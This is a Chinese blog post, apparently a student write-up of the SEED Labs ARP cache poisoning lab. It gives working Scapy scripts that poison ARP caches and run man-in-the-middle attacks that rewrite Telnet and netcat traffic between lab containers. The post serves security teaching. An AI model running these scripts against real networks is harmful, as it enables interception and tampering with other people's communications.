seedlab:ARP

最新推荐文章于 2024-05-30 16:08:30 发布
最新推荐文章于 2024-05-30 16:08:30 发布
阅读量336 收藏 4
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gungir_/article/details/126873935
版权

ARP

Task 1: ARP Cache Poisoning

启动容器
![[Pasted image 20220826153216.png]]

Task 1.A (using ARP request)

进入主机A,检查A的arp缓存(应该为空)
![[Pasted image 20220826154122.png]]

进入主机M,编写下列代码并运行

#!/usr/bin/python3 
from scapy.all import * 
# M
src_mac='02:42:0a:09:00:69'# M
dst_mac='00:00:00:00:00:00' 
dst_mac_eth='ff:ff:ff:ff:ff:ff' 
src_ip='10.9.0.6' # B 
dst_ip='10.9.0.5' # 任意 IP 
eth = Ether(src=src_mac,dst=dst_mac_eth) 
arp = ARP(hwsrc=src_mac, psrc=src_ip,  pdst=dst_ip, op=1) 
pkt = eth / arp 
sendp(pkt)

在主机A中查看arp缓存
![[Pasted image 20220826154825.png]]

Task 1.B (using ARP reply)

先删除主机A的ARP缓存
![[Pasted image 20220826155000.png]]

在M中构造应答包代码,并运行

#!/usr/bin/python3
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='02:42:0a:09:00:05' # A
src_ip='10.9.0.6' # B
dst_ip='10.9.0.5' # A
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)

在A中启动tcpdump,确实监听到了应答包,但是arp缓存未发生改变
![[Pasted image 20220826160732.png]]
![[Pasted image 20220826161004.png]]

Task 1C (using ARP gratuitous message)

在M中编写并运行下列代码

#!/usr/bin/python3
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='ff:ff:ff:ff:ff:ff' # broadcast MAC address
src_ip='10.9.0.6' # B
dst_ip='10.9.0.6' # B
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)

在A中启动tcpdump,确实监听到了应答包,但是arp缓存未发生改变

在这里插入图片描述
在这里插入图片描述

Task 2: MITM Attack on Telnet using ARP Cache Poisoning

Step 1

在M中编写并允许下列代码

 #!/usr/bin/python3
#!/usr/bin/python3
from scapy.all import *

broadcast_mac = "FF:FF:FF:FF:FF:FF"
# machine A
A_mac = "02:42:0a:09:00:05"
A_ip = "10.9.0.5"
# machine B
B_mac = "02:42:0a:09:00:06"
B_ip = "10.9.0.6"
# machine M
M_mac = "02:42:0a:09:00:69"
M_ip = "10.9.0.105"

# attack machine A
E = Ether(src=M_mac, dst=broadcast_mac)
A = ARP(hwsrc=M_mac, psrc=B_ip, pdst=A_ip)
sendp(E/A)
# attack machine B
E = Ether(src=M_mac, dst=broadcast_mac)
A = ARP(hwsrc=M_mac, psrc=A_ip, pdst=B_ip)
sendp(E/A)

查看AB主机中arp缓存
![[Pasted image 20220826161737.png]]

![[Pasted image 20220826161748.png]]

Step 2

在M中关闭路由转发

sysctl net.ipv4.ip_forward=0

在主机B中ping 主机A(无法成功)
![[Pasted image 20220826162206.png]]

Step 3

在M中打开路由转发

sysctl net.ipv4.ip_forward=1

在主机B中ping 主机A(成功)
![[Pasted image 20220826162345.png]]

Step 4

在M上打开包转发功能,然后在机器A上使用telnet连接B(成功连接)
![[Pasted image 20220826163345.png]]

关闭B的IP转发功能后,在机器A上使用telnet连接B(无法连接)
![[Pasted image 20220826163513.png]]

在M上编写代码并运行

#!/usr/bin/env python3
from scapy.all import *
import re

# Who can it be used? Write first!
IP_A = "10.9.0.5"
IP_B = "10.9.0.6"


print("********** MITM attack on Telnet **********")


def spoof_pkt(pkt):
    if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].payload)
        del(newpkt[TCP].chksum)

        if pkt[TCP].payload:
            data = pkt[TCP].payload.load
            data = data.decode()
            print("Old:"+data)
            newdata = re.sub(r'[a-zA-Z]', r'Z', data)
            print("New:"+newdata)
            send(newpkt/newdata, verbose=False)
        else:
            send(newpkt, verbose=False)
    elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        send(newpkt, verbose=False)


f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06)'
pkt = sniff(filter=f, prn=spoof_pkt)

在A中使用telnet连接B,无论输入什么都会显示为Z
![[Pasted image 20220826170702.png]]

Task 3: MITM Attack on Netcat using ARP Cache Poisoning

可以使用以下命令在A和B之间建立netcat TCP连接

#On Host B (server, IP address is 10.9.0.6), run the following:
nc -lp 9090

#On Host A (client), run the following:
nc 10.9.0.6 9090

在M中编写攻击脚本

#!/usr/bin/env python3
from scapy.all import *

# We Only use ip
IP_A = "10.9.0.5"
IP_B = "10.9.0.6"


print("********** MITM attack on Netcat **********")


def spoof_pkt(pkt):
    if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].payload)
        del(newpkt[TCP].chksum)

        if pkt[TCP].payload:
            data = pkt[TCP].payload.load
            print("Old:"+str(data))
            newdata = data.replace(b'Hello', b'attacked') # replace name
            print("New:"+str(newdata))
            newpkt[IP].len = pkt[IP].len + len(newdata) - len(data)
            send(newpkt/newdata, verbose=False)
        else:
            send(newpkt, verbose=False)
    elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        send(newpkt, verbose=False)


f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06)'
pkt = sniff(filter=f, prn=spoof_pkt)

在A中发送Hello
![[Pasted image 20220826172544.png]]

B中被篡改为attacked
![[Pasted image 20220826172617.png]]

gungir_
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SeedLabARP Cache Poisoning Attack Lab
cold_windx的博客
08-29 1367
在Attacker的主机上向HostA发送一则免费ARP,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。在Attacker的主机上向HostA发送一则ARP回复,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。接下来,我们清空掉HostA的ARP缓存,在尝试一遍攻击。在Attacker的主机上向HostA发送一则ARP请求,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。...
SEED LabARP Cache Poisoning Attack Lab
qq_43599063的博客
07-10 1641
一共有三台机器,我们使用Host M进行攻击,因为ARP协议只在局域网上运行,所以三台机器在同一个局域网上面。实验目的:在主机 M 上,构造一个 ARP 请求包,发送给主机 A。查看主机 A 的 ARP 缓存中 M 的 MAC 地址是否映射到 B 的 IP 地址。 1.首先要进入hostA和主机M,因为ARP协议只能在局域网内才有用。 2.查看主机A里面的ARP缓存看是否已经缓存了B,如果有就要删除。 3.编写代码。 4.运行并查看结果,主要代码要在主机M里面运行。 在主机 M 上,构造一个 ARP
Seedlabs】ARP Cache Poisoning Attack Lab
seven49的博客
04-06 5334
目录 一、实验环境 二、实验内容 Task 1: ARP Cache Poisoning Task 2: MITM Attack on Telnet using ARP Cache Poisoning 一、实验环境 本地共有三台虚拟机,位于同一个子网下。地址如下: 主机名 IP 地址 MAC 地址 M (攻击者) 10.9.0.105 02:42:0a:09:00:69 A (客户端) 10.9.0.5 02:42:0a:09:00:05 .
SEEDLab ARP Cache Poisoning Attack Lab 实验报告
C_Ronaldo__的博客
12-26 2226
文章目录实验过程实验环境一个小tipstask1:ARP Cache Poisoningtask 1A (using ARP request)task 1B (using ARP reply)结果分析:task 1C (using ARP gratuitous message)结果分析:实验总结 实验过程 实验环境 主机名 IP地址 MAC地址 M (攻击者) 10.0.2.4 08:00:27:E9:CF:F4 A (客户端) 10.0.2.5 08:00:27:40:49:4E
信息安全 SEED Lab11 ARP Cache Poisoning Attack Lab
crazyliu的博客
07-15 2925
这部分主要是理解ARP协议和实施一些对ARP的攻击。 本地共有三台虚拟机,位于同一个子网下。地址如下: Name Mac Address IP Address A 08:00:27:7e:82:57 10.0.2.4 B 08:00:27:34:bf:1e 10.0.2.5 C 08:00:27:62:26:68 10.0.2.6 Task 1. ARP缓存投毒攻击 这部分主要是通过不同的方式实施ARP缓存投毒攻击。 Task 1A 这部分是通过ARP请求广播来实施ARP缓存投毒
SeedLab3: ARP Cache Poisoning Attack Lab
Rachel_IS的博客
01-19 2804
来啦ARP Lab~ 有种复习Scapy的感觉,不过被官方代码坑到了( •́ㅿ•̀ ) Task 1 第一关就是试试ARP缓存毒害攻击 先发个ARP request康康 发之前是这样的,对应的就是真实MAC 发了之后成功替换(中间人的MAC就是下面那个) 然后再试试ARP reply行不行 效果一样滴 再发个gratuitous ARP康康效果 (这种ARP一般是用于开机的时候向同网段其他主机通告自己的MAC看看有没有冲突,或者是主机改变MAC时用于更新) 也很有效果 好了,能进行ARP欺骗
SeedLab5: The Mitnick Attack Lab
Rachel_IS的博客
01-19 2634
PS:这个Lab最好在Sniffing_Spoofing Lab(熟悉Scapy的sniff和spoof语法)和TCP/IP Attack Lab之后进行 文档之前有一大段介绍,黑客Kevin Mitnick进行了TCP会话劫持攻击,他的步骤是: 1.对服务器进行SYN洪泛攻击,使其无法接受TCP连接请求而静默 2.伪造TCP连接(因为被害者主机会把正常的SYN ACK包发回到静默的服务器,也无法进行嗅探,黑客需要预测对方发回的Sequence number) 3.将建立的TCP连接用于远程登录(rsh),
计算机病毒与防护:ARP欺骗.ppt
06-10
ARP Cache 在安装了以太网网络适配器(即网卡)或TCP/IP协议的计算机中,都有ARP Cache用来保存IP地址以及解析的MAC地址。 Windows系统默认的ARP缓存表的生存时间是120秒,最大生命期限是10分钟 ARP工作原理 aa:aa:...
ARPPD:ARP中毒防御者脚本
05-10
这是一个用C语言编写的脚本,用于提供针对恶意ARP攻击的保护,该攻击会更改受害者PC的ARP表中的网关MAC地址。 这个怎么运作 查看我的博客文章以获取有关脚本工作原理的详细信息。 安装和构建 ARPPD需要arptables和...
arproxy:arp代理守护程序
05-13
arproxy arp代理守护程序
实验二:ARP协议以及IP地址和MAC地址关系.docx
07-18
一、实验目的 1.掌握ARP协议常用命令; 2.掌握ARP协议的工作过程; 3.掌握IP地址和MAC地址的关系;
信息安全技术:ARP协议.pptx
11-01
信息安全技术基础
Linux防火墙之iptables(二)
lxplxplike的博客
05-26 945
在Internet中发布位于局域网内的服务器。
I2C SPI UART TCP/UDP AD/DA PWM大总结
芯心智库
05-26 784
那么当处理器输出的是全0则外部测量的电压是0V,输出全1则外部测量电压是5V,如果0/1各一半则是输出2.5V,如此只要控制0/1的比例就可以控制电压的输出了。V1是待测的电压,V0是比较器的输出电压,两者会进入比较器,直到结果V0大于V1(注意是大于,不是等于,这里会引入精度的概念),此时的计数值是D0~D7,可以表示此时的电压数值的水平。UART就比较特殊点了,它是异步通信(无CLK进行同步,有CLK的就是USART),全双工,有两根数据线,一根是RX一根是TX。
冶炼钢铁厂热风炉发酵池煤矸石进回水无线远程温度监测
最新发布
weixin_46970383的博客
05-30 269
Modbus RTU 标准Modbus-RTU通信协议。Modbus RTU使用二进制格式传输数据,并使用串行通信协议(如RS-232或RS-485)进行数据传输。它通常用于连接不同厂家的可编程逻辑控制器(PLC)、传感器、执行器和其他自动化设备。
【TC8】如何测试IOP中PHY芯片的Llink-up time
jasonj333
05-28 110
在TC8一致性测试用例中,物理层的测试用例分为两个部分:IOP和PMA。其中IOP中对PHY芯片的Link-up时间的测试,又包含三个测试用例。这三条case从名称就能够判断出它们的不同。OABR_LINKUP_01是给DUT的对手件上电唤醒,OABR_LINKUP_02是DUT上电唤醒,OABR_LINKUP_03是DUT报文唤醒。
AWS 高防和阿里云高防深度对比
九河云的创作之路
05-29 343
而阿里云高防则提供了更加全面的网络安全解决方案,包括DDoS高防和WAF高防两种服务,适合对于网络安全要求较高的客户。AWS的增强防护服务可以提供最高达20Tbps的防护能力,可以有效地抵御各种规模的DDoS攻击。而阿里云的DDoS高防服务也可以提供最高达100Gbps的防护能力,能够应对大规模的DDoS攻击。而阿里云的全球加速网络也可以为客户提供高速、低延迟的网络连接,确保了防护服务的性能表现。而WAF高防服务则可以提供Web应用防火墙和DDoS高防的结合,为企业的Web应用提供全面的安全保护。
note-网络是怎样连接的4 接入网和网络运营商
qq_42783188的博客
05-29 393
在BAS和运营商路由器之间的ADSL/FTTH接入服务商的网络中建立隧道,把用户到BAS的接入网连接起来,形成一条从用户一直到运营商路由器的通道。这些状况不是稳定出现的。一方路由器让相连的运营商的路由器告知路由信息后,就能知道对方路由器连接的所有网络,把这些信息写入自己的路由表中,就能向那些网络发送包了。运营商之间的路由交换是在特定路由器间一对一进行的,运营商可以只将路由信息提供给交了费的运营商,没交费的运营商无法将网络包发送过来。Modem产生的信号是以一定周期振动的波,振动的起始位置不同,波形就不同。
名词解析:ARP、IP、CIDR、ICMP、RIP、静态路由、动态路由、OSPF、NAT
06-13
- ARP(地址解析协议):用于将IP地址转换成MAC地址,从而实现局域网内设备间的通信。 - IP(Internet Protocol,互联网协议):是一种网络协议,它用于在网络中传输数据包,使得网络中的设备能够相互通信。 - CIDR...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值